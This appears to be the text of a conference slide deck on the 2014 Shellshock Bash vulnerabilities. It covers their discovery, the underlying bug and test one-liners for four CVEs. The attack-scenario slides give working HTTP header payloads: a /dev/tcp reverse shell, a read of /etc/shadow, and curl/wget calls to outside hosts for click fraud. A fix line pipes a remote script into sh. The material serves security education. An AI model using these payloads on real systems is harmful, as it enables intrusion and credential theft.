This document summarizes the Shellshock bug in Bash software discovered in September 2014. It describes four vulnerabilities (CVE-2014-6271, CVE-2014-6277, CVE-2014-7169, and an unknown CVE) that could allow remote code execution by manipulating environment variables passed to Bash. The document also outlines potential attack scenarios like reverse shells, data theft, and click fraud that could exploit Shellshock. It concludes by mentioning Patch 27 and a script to fix the vulnerable Bash versions.

1. Sharath Unni
@haxorhead
http://hackabab.com/shellshock/

2. DISCOVERY
Stéphane Chazelas discovered the bug on 12 September 2014, told a few
and publicly announced on 24th Sept
CVE-2014-6271
By 25th Sept, botnets had sprung up performing DDoS.
By 26th Sept, a botnet called “wopbot”, was being used DDoS attack
against Akamai Technologies and to scan the US DoD.

3. BACKGROUND
Affects Bash up to version 4.3 Patch 26
Analysis of the source code shows the bug existed as early as 1.13 in 1992
Each program running under Unix like OS has access to a list of env
variables. These are passed to new programs started by the parent.
Bash maintains a list of functions, callable only from within Bash.
Bash can exec itself. Exporting env variables and func defs.

4. BACKGROUND
Exported functions def begin with () in the new bash’s env var list.
New bash reads the value of the env var list and converts them back to
functions
This conversion is done by executing code from the value, creating the func
on the fly.
Vulnerable versions of bash do not check if the value contains only func
def
Passing a func value & code will cause code to be called as well

5. CVE-2014-6271
First bug - Stéphane Chazelas
env x='() { :;}; echo vulnerable' bash -c "date“
Breakdown
() { :; }; - Empty environment variable declaration
/bin/bash –c - Call into Bash and pass a string with a command
echo vulnerable – command that ideally should not be executed

6. CVE-2014-6277
• Discovered by Michał Zalewski
bash -c "f() { x() { _;}; x() { _;} <<a; }" 2>/dev/null
|| echo vulnerable

7. CVE-2014-7169
Third bug – Tavis Ormandy
It was found that the fix for CVE-2014-6271 was incomplete, and Bash still
allowed certain characters to be injected into other environments via
specially crafted environment variables.
env X='() { (a)=>' bash -c "echo date"; cat echo ;
rm -f echo

8. UNKNOWN CVE
Fourth bug
env -i X=' () { }; echo hello' bash -c 'date'
Demo

9. ATTACK SCENARIOS
Automated Click Fraud – Blackhat SEO
Accept: () { :;}; /bin/bash -c "curl
http://31.41.42[.]109/search/wphp/j.php?cgi=XXX"
User-Agent: () { :;}; /bin/bash -c "wget -q -O /dev/null
http://ad.dipad[.]biz/test/http://XXXXXX.com/“5

10. ATTACK SCENARIOS
dev/tcp reverse shell
GET /cgi-bin/ HTTP/1.1
Host: x.x.x.x
User-Agent: () { :;}; /bin/bash -c '/bin/bash -i >&
/dev/tcp/handler-ip/3333 0>&1'

11. ATTACK SCENARIOS
Data theft
GET /cgi-bin/status.cgi HTTP/1.0
User-Agent: () { :;}; echo "Bag:" $(</etc/shadow)

12. FIXES
Patch 27 - https://ftp.gnu.org/gnu/bash/bash-4.3-patches/
curl https://shellshocker.net/fixbash | sh

13. THANK YOU!
@haxorhead
http://www.hackabab.com/